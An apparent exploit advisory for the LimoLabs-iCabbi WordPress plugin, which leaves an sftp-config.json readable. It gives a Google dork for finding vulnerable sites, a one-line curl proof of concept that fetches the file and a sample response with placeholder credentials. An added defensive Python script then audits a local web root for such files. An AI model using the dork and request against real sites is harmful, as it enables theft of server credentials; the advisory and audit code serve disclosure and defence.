WordPress LimoLabs 1.0.0 Remote Password Disclosure Vulnerability

2018-07-24
ID: 98691
CVE: None
Download vulnerable application: None
# Exploit Title: WordPress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )
# Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4
* PoC:
$ curl http://<TARGET>/wp-content/plugins/limolabs-icabbi/sftp-config.json
* Response:
...
    "host": "1.3.3.7",
    "user": "foo",
    "password": "bar",
    "port": "22",
...
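
A defender-side check for the exposure shown above, as an added example that is not part of the original advisory: it walks a web root on a host you administer, finds any sftp-config.json, and reports which secret-bearing keys it holds without printing their values. The key names other than "password", the tolerance for // comment lines and trailing commas, and the constructed sample tree are assumptions made for illustration.

```python
import json
import os
import re
import tempfile

# "password" is the key shown in the advisory's response; the other two are assumptions.
SECRET_KEYS = {"password", "passphrase", "ssh_key_file"}
CONFIG_NAME = "sftp-config.json"


def strip_line_comments(text):
    """Drop whole-line // comments and trailing commas so json.loads accepts the file."""
    lines = [ln for ln in text.splitlines() if not ln.lstrip().startswith("//")]
    return re.sub(r",(\s*[}\]])", r"\1", "\n".join(lines))


def audit_webroot(webroot):
    """Return [(relative_path, secret keys present)] for each config file under webroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        if CONFIG_NAME not in files:
            continue
        path = os.path.join(dirpath, CONFIG_NAME)
        with open(path, encoding="utf-8", errors="replace") as fh:
            raw = fh.read()
        try:
            data = json.loads(strip_line_comments(raw))
            keys = sorted(k for k in SECRET_KEYS if data.get(k))
        except (ValueError, AttributeError):
            # Unparseable file: fall back to a key-name search; values are never echoed.
            keys = sorted(k for k in SECRET_KEYS if re.search(r'^\s*"%s"\s*:' % k, raw, re.M))
        findings.append((os.path.relpath(path, webroot), keys))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree mirroring the plugin path named in the advisory."""
    root = tempfile.mkdtemp()
    plugin = os.path.join(root, "wp-content", "plugins", "limolabs-icabbi")
    os.makedirs(plugin)
    with open(os.path.join(plugin, CONFIG_NAME), "w", encoding="utf-8") as fh:
        fh.write('{\n  // constructed sample\n  "host": "1.3.3.7",\n'
                 '  "user": "foo",\n  "password": "bar",\n  "port": "22",\n}\n')
    return root


if __name__ == "__main__":
    for rel, keys in audit_webroot(build_sample_webroot()):
        print(f"{rel}: exposed config, secret keys present: {', '.join(keys) or 'none'}")
```

Any hit means the file should be removed from the deployed tree and the credentials it held rotated.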